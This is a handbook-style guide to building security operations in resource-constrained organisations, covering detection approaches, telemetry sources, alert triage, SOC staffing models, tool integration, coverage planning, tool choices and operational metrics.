On this page

Security Operations

Security operations encompasses the people, processes, and technology that detect, analyse, and respond to security events across an organisation’s environment. A Security Operations Centre (SOC) provides the organisational structure for these capabilities, whether implemented as dedicated staff, shared responsibilities, or outsourced services. The function exists to reduce the time between an adversary’s initial access and the organisation’s detection and containment of that access.

Mission-driven organisations face a particular challenge: the same resource constraints that limit security investment also make them attractive targets for adversaries who assume weak defences. Effective security operations must therefore be designed for the capacity actually available, not an idealised staffing model. A single IT person reviewing authentication logs weekly provides more security value than an unstaffed SIEM generating ignored alerts.

Security Operations Centre: The function responsible for monitoring, detecting, and responding to security events. May be a physical location, a virtual team, a managed service, or a defined responsibility within a broader IT role.
Security Event: An observable occurrence in a system or network that has potential security relevance. Events become incidents when analysis determines malicious activity or policy violation occurred.
Security Incident: A confirmed security event that violates security policy, results in unauthorised access, or indicates malicious activity requiring response.
Mean Time to Detect: The average duration between an adversary’s initial compromise and the organisation’s detection of that compromise. Industry median exceeds 200 days; mature security operations achieve under 24 hours.
Mean Time to Respond: The average duration between detection of an incident and containment of the threat. Measured in hours for mature operations; days or weeks for organisations without defined response procedures.
Alert Fatigue: Degraded analyst responsiveness resulting from excessive false positive alerts. Occurs when more than 30% of alerts require no action, causing analysts to dismiss or ignore legitimate alerts.

Detection Fundamentals

Detection relies on collecting telemetry from systems, normalising that data into a searchable format, and applying logic to identify patterns indicating malicious activity. The detection mechanism operates through three distinct approaches that complement rather than replace each other.

Signature-based detection compares observed data against known indicators of compromise. A file hash matching known malware, a network connection to a documented command-and-control server, or an authentication attempt using a credential from a published breach all trigger alerts through pattern matching. This approach catches known threats with high confidence and low false positive rates, but provides no protection against novel attacks or indicators not yet catalogued.

Behavioural detection establishes baselines of normal activity and alerts when observations deviate from those baselines. An administrator account authenticating from a new country, a workstation initiating connections to 50 internal systems within one minute, or a service account suddenly accessing file shares it has never touched all represent behavioural anomalies. This approach can detect unknown threats but generates higher false positive rates, particularly during legitimate changes to business operations.

Heuristic detection applies rules encoding security expertise without requiring exact matches. A PowerShell script downloading content from the internet and immediately executing it matches the pattern of a dropper regardless of the specific URLs or payloads involved. This approach bridges signatures and behaviours, catching variations of known techniques without requiring exact indicators.

Effective detection combines all three approaches. Signature detection handles known threats with minimal analyst burden. Behavioural detection surfaces unusual activity for investigation. Heuristic detection catches technique variations that evade signature matching.

Telemetry Sources

Detection quality depends directly on telemetry coverage. Gaps in visibility create blind spots where adversaries operate undetected. Each telemetry source provides distinct observability into different attack stages.

Endpoint telemetry captures process execution, file system changes, registry modifications, network connections initiated by processes, and user activity on workstations and servers. Endpoint Detection and Response (EDR) tools collect this telemetry continuously, enabling reconstruction of attack chains and identification of malicious process behaviour. A workstation without EDR can be compromised, used for lateral movement, and exfiltrated without generating any detectable events. Coverage targets should reach 100% of managed endpoints; unmanaged devices represent detection gaps.

Network telemetry records connections between systems, traffic volumes, protocol usage, and in some deployments, packet contents. Network detection reveals lateral movement between systems, data exfiltration volumes, and command-and-control communication patterns. Network flow data (source, destination, ports, bytes transferred) provides baseline visibility; full packet capture enables deep inspection at significant storage cost. Encrypted traffic limits content inspection but metadata patterns remain observable.

Authentication telemetry logs every authentication attempt across directory services, applications, VPNs, and cloud platforms. Failed authentications reveal password spraying and brute force attacks. Successful authentications from unusual locations, devices, or times indicate potential account compromise. Authentication logs from the identity provider represent the highest-value single log source because credential compromise precedes nearly all attack progressions.

Cloud platform telemetry captures administrative actions, configuration changes, and resource access across cloud infrastructure. A new administrative user created in the cloud console, a storage bucket made public, or an unusual region receiving resource deployments all appear in cloud audit logs. Cloud providers generate extensive telemetry that often goes uncollected; enabling and centralising these logs closes significant visibility gaps.

Application telemetry records business application events including access attempts, data exports, privilege changes, and error conditions. Applications vary dramatically in logging quality; commercial SaaS platforms typically provide comprehensive audit logs while internally developed applications may log minimally or not at all.

The following diagram illustrates telemetry flow from sources through collection infrastructure:

+------------------------------------------------------------------+
|                    ORGANISATIONAL ENVIRONMENT                      |
+------------------------------------------------------------------+
|                                                                    |
|  +------------------+  +------------------+  +------------------+  |
|  | ENDPOINTS        |  | NETWORK          |  | CLOUD PLATFORMS  |  |
|  |                  |  |                  |  |                  |  |
|  | +------+ +-----+ |  | +------+         |  | +------+         |  |
|  | | EDR  | |Syslog |  | |NetFlow|        |  | | Audit|         |  |
|  | |Agent | |Agent| |  | |Export|         |  | | Logs |         |  |
|  | +--+---+ +--+--+ |  | +--+---+         |  | +--+---+         |  |
|  |    |        |    |  |    |             |  |    |             |  |
|  +----+--------+----+  +----+-------------+  +----+-------------+  |
|       |        |            |                     |                |
|       v        v            v                     v                |
|  +------------------------------------------------------------------+
|  |                    LOG COLLECTORS / FORWARDERS                   |
|  |  +------------+  +------------+  +------------+  +------------+  |
|  |  | Endpoint   |  | Network    |  | Cloud      |  | Application|  |
|  |  | Collector  |  | Sensor     |  | Connector  |  | Collector  |  |
|  |  +-----+------+  +-----+------+  +-----+------+  +-----+------+  |
|  |        |               |               |               |        |
|  +--------+---------------+---------------+---------------+--------+
|           |               |               |               |
|           v               v               v               v
|  +------------------------------------------------------------------+
|  |                         LOG AGGREGATION                          |
|  |                                                                  |
|  |  +----------------------------------------------------------+   |
|  |  |                    Message Queue                          |   |
|  |  |              (Kafka / Redis / RabbitMQ)                   |   |
|  |  +---------------------------+------------------------------+   |
|  |                              |                                   |
|  +------------------------------------------------------------------+
|                                 |
|                                 v
|  +------------------------------------------------------------------+
|  |                      SIEM / ANALYTICS PLATFORM                   |
|  |                                                                  |
|  |  +-------------+  +-------------+  +-------------+              |
|  |  | Parsing     |  | Enrichment  |  | Detection   |              |
|  |  | Engine      +->| Engine      +->| Engine      |              |
|  |  +-------------+  +-------------+  +------+------+              |
|  |                                           |                      |
|  |                                           v                      |
|  |                                    +------+------+              |
|  |                                    | Alert       |              |
|  |                                    | Queue       |              |
|  |                                    +-------------+              |
|  +------------------------------------------------------------------+
|
+----------------------------------------------------------------------+

Figure 1: Telemetry collection architecture from sources through SIEM processing

Alert Triage

Raw detection output requires human analysis to distinguish true threats from false positives, determine severity, and initiate appropriate response. Triage systematically evaluates each alert to enable efficient allocation of analyst attention.

Alert priority derives from two factors: the severity of potential impact if the alert represents true malicious activity, and the fidelity of the detection rule that generated the alert. A high-severity alert from a high-fidelity rule demands immediate investigation. A low-severity alert from a low-fidelity rule can queue for batch review. This two-dimensional prioritisation prevents both ignored critical alerts and analyst time wasted on low-value investigations.

The triage decision tree applies to each alert entering the analyst queue:

                           +------------------+
                           | Alert Received   |
                           +--------+---------+
                                    |
                           +--------v---------+
                           | Known false      |
                           | positive pattern?|
                           +--------+---------+
                                    |
                  +-----------------+-----------------+
                  |                                   |
                  | Yes                               | No
                  v                                   v
         +--------+---------+                +--------+---------+
         | Auto-close       |                | Asset context    |
         | Update tuning    |                | available?       |
         | backlog          |                +--------+---------+
         +------------------+                         |
                                       +--------------+--------------+
                                       |                             |
                                       | Yes                         | No
                                       v                             v
                              +--------+---------+          +--------+---------+
                              | Critical asset?  |          | Query asset      |
                              +--------+---------+          | inventory        |
                                       |                    +--------+---------+
                          +------------+------------+                |
                          |                         |                |
                          | Yes                     | No             |
                          v                         v                v
                 +--------+---------+      +--------+---------+      |
                 | Escalate         |      | Standard         |<-----+
                 | immediately      |      | investigation    |
                 | P1 response      |      | queue            |
                 +--------+---------+      +--------+---------+
                          |                         |
                          v                         v
                 +--------+---------+      +--------+---------+
                 | Incident         |      | Investigate      |
                 | Commander        |      | within SLA       |
                 | engaged          |      | (4 hours P2,     |
                 +------------------+      |  24 hours P3)    |
                                           +--------+---------+
                                                    |
                                           +--------v---------+
                                           | Malicious        |
                                           | activity         |
                                           | confirmed?       |
                                           +--------+---------+
                                                    |
                                  +-----------------+-----------------+
                                  |                                   |
                                  | Yes                               | No
                                  v                                   v
                         +--------+---------+                +--------+---------+
                         | Escalate to      |                | Close alert      |
                         | incident         |                | Document         |
                         | response         |                | findings         |
                         +------------------+                +------------------+

Figure 2: Alert triage decision tree determining investigation priority and escalation

Investigation SLAs ensure alerts receive attention within defined timeframes. Priority 1 alerts indicating active compromise require investigation initiation within 15 minutes. Priority 2 alerts suggesting potential compromise require investigation within 4 hours. Priority 3 alerts representing suspicious but low-confidence activity require investigation within 24 hours. Priority 4 informational alerts aggregate for weekly trend review.

Triage efficiency depends on analyst access to contextual information. An alert showing an authentication from an unusual country requires knowing whether that user is travelling. A connection to an unknown external IP requires reputation data about that address. Enrichment provides this context automatically, attaching asset ownership, user department, IP reputation, and threat intelligence to alerts before analyst review.

Operational Models

Security operations implementations vary based on organisational resources, risk profile, and technical capacity. Each model offers distinct trade-offs between cost, control, expertise, and coverage.

An internal SOC employs dedicated security analysts who monitor, investigate, and respond to events using organisation-owned infrastructure. This model provides maximum control over processes, complete visibility into investigations, and direct alignment with organisational context. Building internal capability requires sustained investment: a minimum viable 24/7 SOC needs eight to ten full-time analysts to cover shifts accounting for leave, training, and attrition. Organisations without this staffing capacity cannot maintain continuous internal operations.

An outsourced SOC engages a Managed Security Service Provider (MSSP) or Managed Detection and Response (MDR) provider to perform monitoring and initial investigation. The provider’s analysts monitor alerts from the organisation’s environment alongside other clients, escalating confirmed incidents to organisational staff for response decisions. This model provides 24/7 coverage without corresponding staffing investment, access to specialist expertise across a broader threat landscape, and often faster deployment than building internal capability. Trade-offs include reduced control over investigation processes, potential context gaps where provider analysts lack organisational knowledge, and dependency on contractual service levels.

A hybrid model combines internal analysts handling business-hours monitoring and incident response with external providers covering nights, weekends, and holidays or providing specialist capabilities. This model balances control with coverage, maintaining internal expertise while avoiding the staffing requirements of full 24/7 operations. Handoff procedures between internal and external teams require careful design to prevent incidents falling between responsibilities.

For organisations without dedicated security staff, security operations integrates into broader IT responsibilities. A distributed model assigns security monitoring tasks to IT staff who handle security alongside other duties. This approach acknowledges that many organisations cannot justify dedicated security headcount, but security events still require detection and response. The distributed model requires automated tooling to reduce manual monitoring burden, clear escalation paths when events exceed IT staff capability, and external support agreements for incident response.

The following diagram shows responsibility distribution across operational models:

+------------------------------------------------------------------+
|                    SECURITY OPERATIONS MODELS                      |
+------------------------------------------------------------------+

+------------------------------------------------------------------+
| INTERNAL SOC                                                       |
|                                                                    |
| +-----------------------+  +-----------------------+              |
| | Organisation Staff    |  | Organisation Staff    |              |
| | (Tier 1 Analysts)     |  | (Tier 2/3 Analysts)   |              |
| |                       |  |                       |              |
| | - 24/7 monitoring     |  | - Deep investigation  |              |
| | - Initial triage      |  | - Incident response   |              |
| | - Alert handling      |  | - Threat hunting      |              |
| +-----------------------+  +-----------------------+              |
|                                                                    |
| Infrastructure: Organisation-owned SIEM, EDR, SOAR                |
+------------------------------------------------------------------+

+------------------------------------------------------------------+
| OUTSOURCED SOC (MSSP/MDR)                                         |
|                                                                    |
| +-----------------------+  +-----------------------+              |
| | Provider Staff        |  | Organisation Staff    |              |
| | (Analyst Team)        |  | (IT/Security Contact) |              |
| |                       |  |                       |              |
| | - 24/7 monitoring     |  | - Escalation receipt  |              |
| | - Triage and analysis |  | - Response decisions  |              |
| | - Escalation          |  | - Remediation actions |              |
| +-----------------------+  +-----------------------+              |
|                                                                    |
| Infrastructure: Provider platform, org log forwarding             |
+------------------------------------------------------------------+

+------------------------------------------------------------------+
| HYBRID MODEL                                                       |
|                                                                    |
| +-----------------------+  +-----------------------+              |
| | Organisation Staff    |  | Provider Staff        |              |
| | (Business Hours)      |  | (After Hours)         |              |
| |                       |  |                       |              |
| | - Daytime monitoring  |  | - Night/weekend cover |              |
| | - Incident response   |  | - Escalation to on-call|             |
| | - Threat hunting      |  | - Initial containment |              |
| +-----------------------+  +-----------------------+              |
|                                                                    |
| Infrastructure: Shared access to organisation SIEM                |
+------------------------------------------------------------------+

+------------------------------------------------------------------+
| DISTRIBUTED (RESOURCE-CONSTRAINED)                                |
|                                                                    |
| +-----------------------+  +-----------------------+              |
| | IT Staff              |  | External Retainer     |              |
| | (Shared Duties)       |  | (Incident Response)   |              |
| |                       |  |                       |              |
| | - Weekly log review   |  | - On-call for major   |              |
| | - Automated alerts    |  |   incidents           |              |
| | - Basic triage        |  | - Forensic capability |              |
| +-----------------------+  +-----------------------+              |
|                                                                    |
| Infrastructure: Cloud-native logging, minimal on-premises         |
+------------------------------------------------------------------+

Figure 3: Security operations model comparison showing responsibility distribution

Tool Integration

Security operations effectiveness depends on integration between detection, investigation, and response tools. Isolated tools create manual handoff burdens and extend response times. Integrated platforms automate data flow and enable coordinated response.

The core tooling stack comprises three categories. Detection platforms including SIEM and EDR generate alerts from collected telemetry. Investigation platforms provide interfaces for analyst queries, case management, and evidence documentation. Response platforms enable containment and remediation actions across managed endpoints and infrastructure.

Integration follows a hub architecture with the SIEM as the central correlation point:

+------------------------------------------------------------------+
|                     SECURITY TOOL INTEGRATION                      |
+------------------------------------------------------------------+
|                                                                    |
|  +------------------+     +------------------+                     |
|  | THREAT INTEL     |     | VULNERABILITY    |                     |
|  | PLATFORM         |     | SCANNER          |                     |
|  |                  |     |                  |                     |
|  | - IOC feeds      |     | - Asset vulns    |                     |
|  | - Actor profiles |     | - Risk scores    |                     |
|  +--------+---------+     +--------+---------+                     |
|           |                        |                               |
|           | IOC enrichment         | Asset context                 |
|           v                        v                               |
|  +----------------------------------------------------------+     |
|  |                                                          |     |
|  |                    SIEM PLATFORM                         |     |
|  |                    (Central Hub)                         |     |
|  |                                                          |     |
|  |  +------------+  +------------+  +------------+          |     |
|  |  | Detection  |  | Case       |  | Dashboards |          |     |
|  |  | Rules      |  | Management |  | Reports    |          |     |
|  |  +------------+  +------------+  +------------+          |     |
|  |                                                          |     |
|  +----+------------------+-------------------+--------------+     |
|       |                  |                   |                     |
|       | Alerts           | Queries           | Playbook triggers  |
|       v                  v                   v                     |
|  +----+------+     +-----+-----+       +-----+-----+              |
|  |           |     |           |       |           |              |
|  | TICKETING |     | EDR       |       | SOAR      |              |
|  | SYSTEM    |     | CONSOLE   |       | PLATFORM  |              |
|  |           |     |           |       |           |              |
|  | - Incident|     | - Endpoint|       | - Automated              |
|  |   tracking|     |   queries |       |   response|              |
|  | - SLA     |     | - Isolate |       | - Playbooks             |
|  |   tracking|     | - Collect |       | - Enrichment            |
|  +-----------+     +-----+-----+       +-----+-----+              |
|                          |                   |                     |
|                          | Host isolation    | Automated actions  |
|                          v                   v                     |
|                    +-----+-------------------+-----+               |
|                    |                               |               |
|                    |      MANAGED ENDPOINTS        |               |
|                    |      AND INFRASTRUCTURE       |               |
|                    |                               |               |
|                    +-------------------------------+               |
|                                                                    |
+------------------------------------------------------------------+

Figure 4: Security tool integration with SIEM as central correlation hub

Security Orchestration, Automation and Response (SOAR) platforms extend this integration by codifying response procedures as automated playbooks. When a SIEM alert triggers, SOAR executes predefined enrichment steps, queries additional systems for context, and either takes automated containment actions or presents analysts with enriched cases ready for decision. SOAR reduces repetitive manual tasks, ensures consistent response procedures, and documents every action for audit and review.

Organisations without SOAR investment can achieve partial automation through SIEM-native capabilities and scripting. Most SIEM platforms support webhook integrations that trigger external actions on alert conditions. A detection rule identifying a compromised account can automatically invoke an API call to the identity provider suspending that account, achieving automated response without dedicated SOAR infrastructure.

Coverage Planning

Continuous monitoring provides maximum detection opportunity but requires proportional investment. Coverage planning balances detection capability against available resources through deliberate trade-offs.

24/7 monitoring ensures alerts receive attention regardless of when adversaries act. Attack timing deliberately exploits business hours assumptions; ransomware deployment and data exfiltration commonly occur during nights and weekends when defenders are unavailable. Continuous coverage requires either shift staffing, outsourced providers, or on-call arrangements with automated escalation.

Business hours monitoring concentrates analyst attention during standard working periods, accepting reduced detection outside those hours. This approach suits organisations where resource constraints preclude continuous coverage and risk profile does not justify premium staffing. Automated detection continues during unmonitored hours; alerts queue for morning review rather than receiving immediate investigation.

Risk-based coverage tiers monitoring intensity by asset criticality. Production systems handling sensitive data receive continuous monitoring with aggressive investigation SLAs. Development environments and lower-risk assets receive business hours coverage with extended investigation timeframes. This approach allocates limited resources toward highest-impact protection.

Coverage decisions require explicit acknowledgement of accepted risk. Monitoring only during business hours means attacks initiated at 2:00 Saturday morning may progress undetected for 60 or more hours before first review. Organisations must document this accepted risk and ensure leadership understands the trade-off between coverage cost and detection delay.

For resource-constrained organisations, a pragmatic minimum coverage model prioritises high-value detection over comprehensive monitoring:

Authentication logs from the identity provider receive daily review, focusing on failed authentication patterns, impossible travel (authentication from geographically distant locations within impossible timeframes), and new device registrations. This single log source reveals credential compromise, the precursor to most attack progressions.

Email security alerts receive same-day review, addressing phishing attempts before credential harvesting succeeds. Cloud platform administrative alerts receive same-day review, catching configuration changes that could enable data exposure or account takeover.

Endpoint protection alerts receive next-business-day review for non-blocking detections. Alerts where the endpoint agent blocked the threat allow delayed review; alerts where the agent detected but did not block require expedited attention.

This minimum model provides meaningful detection capability through approximately 30 minutes of daily review effort, a sustainable commitment for IT staff with competing responsibilities.

Implementation Considerations

For Organisations with Limited IT Capacity

Building security operations capability without dedicated security staff requires focusing on detection sources that provide maximum value with minimum operational burden.

Start with identity provider logs. Microsoft Entra ID, Google Workspace, and Okta all provide authentication logs capturing every sign-in attempt. Configure log export to a searchable destination and establish weekly review of authentication anomalies. Identity provider dashboards highlight risky sign-ins without requiring SIEM infrastructure.

Enable cloud-native security features before investing in additional tooling. Microsoft Defender for Business, Google Workspace security centre, and similar bundled capabilities provide endpoint protection and basic security analytics within existing licensing. These tools lack the depth of dedicated security platforms but deliver substantial detection capability without additional procurement or deployment effort.

Establish an incident response retainer before incidents occur. Identifying and contracting with a security firm for on-call incident response ensures expertise is available when needed without maintaining internal capability. Retainer arrangements typically cost between 5,000 and 15,000 USD annually depending on response time guarantees and included hours.

Consider MDR services providing managed detection with response capability. MDR providers deploy their agents to organisational endpoints, monitor telemetry in their platforms, and alert organisational contacts when investigation warrants attention. Entry-level MDR services for small organisations cost between 3 and 8 USD per endpoint monthly, providing security operations capability without internal infrastructure or expertise.

For Organisations with Established IT Functions

Organisations with dedicated IT teams can implement structured security operations through phased capability building.

Phase 1 establishes centralised log collection. Deploy a SIEM platform capable of ingesting logs from identity providers, cloud platforms, endpoints, and network infrastructure. Open source options including Wazuh and Graylog provide full SIEM capability without licensing costs but require Linux administration skills for deployment and maintenance. Cloud-native options including Microsoft Sentinel integrate tightly with existing Microsoft infrastructure but incur consumption-based costs that scale with log volume.

Phase 2 develops detection content. Default rules in SIEM platforms catch obvious attacks but generate excessive noise in production environments. Develop custom detection rules aligned with your environment’s normal patterns, progressively tuning to reduce false positives while maintaining detection of true threats. Allocate one to two days weekly for detection engineering during the first six months of SIEM operation.

Phase 3 implements structured response procedures. Document investigation and response procedures for common alert types. Define escalation paths, communication templates, and containment authorities. Conduct tabletop exercises validating procedures before requiring them during actual incidents.

Phase 4 adds automation through SOAR or scripted integrations. Identify repetitive triage tasks consuming analyst time and automate enrichment, context gathering, and low-risk response actions. Reserve human decision-making for actions with significant impact or uncertain situations.

Field and Distributed Operations

Organisations with field offices or distributed operations face additional security operations challenges. Intermittent connectivity prevents real-time log streaming from field locations. Local IT support may lack security expertise for initial triage. Time zone distribution complicates escalation and coordination.

Address connectivity limitations through store-and-forward log collection. Deploy lightweight log collectors at field locations that buffer events locally and transmit when connectivity permits. Accept that detection of field-originated events may lag hours or days behind real-time during connectivity outages.

Develop simplified triage guides for field IT staff who may receive initial security questions. Decision trees distinguishing events requiring escalation from events handleable locally reduce burden on central security resources while ensuring serious events receive appropriate attention.

Technology Options

Open Source

Wazuh provides unified security monitoring combining host-based intrusion detection, log analysis, file integrity monitoring, and vulnerability detection. Wazuh deploys agents to endpoints that forward events to a central manager for correlation and alerting. The platform includes pre-built detection rules, dashboard interfaces, and integration capabilities. Deployment requires Linux servers for the manager and indexer components; single-server deployments suit smaller environments while clustered deployments provide scale and redundancy for larger implementations. Wazuh supports integration with external threat intelligence feeds and exports to additional analytics platforms.

Graylog focuses on log management and SIEM functionality with a searchable event store, alerting engine, and dashboard capabilities. Graylog ingests logs via Syslog, GELF, or Beats protocols and normalises events for consistent querying. The open source version provides core log management; commercial versions add features including archiving, audit logging, and support. Graylog requires Elasticsearch or OpenSearch as its underlying data store.

TheHive provides incident response case management, tracking investigations from initial alert through resolution. TheHive integrates with SIEM platforms to receive alerts and with MISP for threat intelligence enrichment. The platform structures investigations as cases containing observables, tasks, and evidence, providing audit trail documentation for incident handling.

Commercial with Nonprofit Programmes

Microsoft Sentinel provides cloud-native SIEM and SOAR capabilities integrated with the Microsoft ecosystem. Sentinel ingests logs from Microsoft 365, Azure, and third-party sources, applies detection analytics, and orchestrates response through Logic Apps playbooks. Nonprofit organisations accessing Microsoft 365 through nonprofit licensing can deploy Sentinel with consumption-based pricing; cost control requires careful log source selection as pricing scales directly with ingested volume. Data resides in Azure regions; US-headquartered Microsoft is subject to CLOUD Act data access requirements regardless of data storage location.

CrowdStrike Falcon combines endpoint detection and response with threat intelligence and managed threat hunting. Falcon’s lightweight agent deploys to endpoints providing detection, response, and forensic capabilities. CrowdStrike offers nonprofit pricing through partner programmes. The platform’s managed threat hunting (Falcon OverWatch) provides human analysis of endpoint telemetry, identifying threats that automated detection misses.

Arctic Wolf provides security operations as a managed service, monitoring customer environments and investigating alerts with their analyst team. Arctic Wolf suits organisations seeking security operations capability without building internal teams or infrastructure. Pricing follows per-seat models; nonprofit pricing is available through inquiry.

Platform	Model	Strengths	Considerations
Wazuh	Open source, self-hosted	No licensing costs; full feature set; data sovereignty	Requires Linux administration; self-supported unless purchasing commercial support
Graylog	Open source, self-hosted	Strong log management; flexible ingestion	Detection rules less mature than dedicated SIEM; commercial features in paid tiers
Sentinel	Commercial SaaS	Deep Microsoft integration; SOAR included; scalable	Consumption pricing unpredictable; CLOUD Act applies; Microsoft ecosystem dependency
CrowdStrike	Commercial SaaS	Strong EDR capability; managed hunting option	Endpoint focus requires complementary log management; premium pricing
Arctic Wolf	Managed service	Full SOC capability without internal staff; flat pricing	Less customisation than owned platforms; dependency on provider

Operational Metrics

Security operations effectiveness measurement enables resource justification, process improvement, and executive communication. Metrics should inform operational decisions rather than merely populate dashboards.

Volume metrics establish operational baseline: alerts generated per day, incidents opened per month, and events ingested per source. Volume trends indicate whether detection is expanding appropriately with infrastructure growth or whether noise is increasing without corresponding value.

Timeliness metrics measure response efficiency: mean time from alert generation to analyst acknowledgement, mean time from incident detection to containment, and percentage of alerts meeting investigation SLA. These metrics reveal operational bottlenecks and staffing gaps.

Quality metrics assess detection value: false positive rate by rule, alerts closed without action, and detection coverage against target frameworks (percentage of MITRE ATT&CK techniques with corresponding detection rules). High false positive rates indicate tuning requirements; coverage gaps indicate detection engineering priorities.

Outcome metrics connect security operations to organisational protection: incidents detected internally versus discovered externally, ransomware or data breach events successfully prevented through early detection, and security incidents by root cause enabling preventive investment prioritisation.

A representative metrics dashboard for a mid-sized organisation might display:

Metric	Target	Current	Trend
Alerts per day	Baseline: 150	142	Stable
P1 alert acknowledgement	Under 15 min	8 min	Improving
P2 investigation SLA compliance	95%	91%	Declining
False positive rate	Under 30%	24%	Stable
MITRE ATT&CK coverage	60%	47%	Improving
MTTD (internal detection)	Under 48 hours	36 hours	Stable
MTTR (containment)	Under 4 hours	2.5 hours	Stable

Declining P2 SLA compliance despite adequate P1 response suggests analyst capacity saturation where urgent alerts receive appropriate attention but lower-priority work queues excessively. This metric pattern supports staffing or automation investment cases.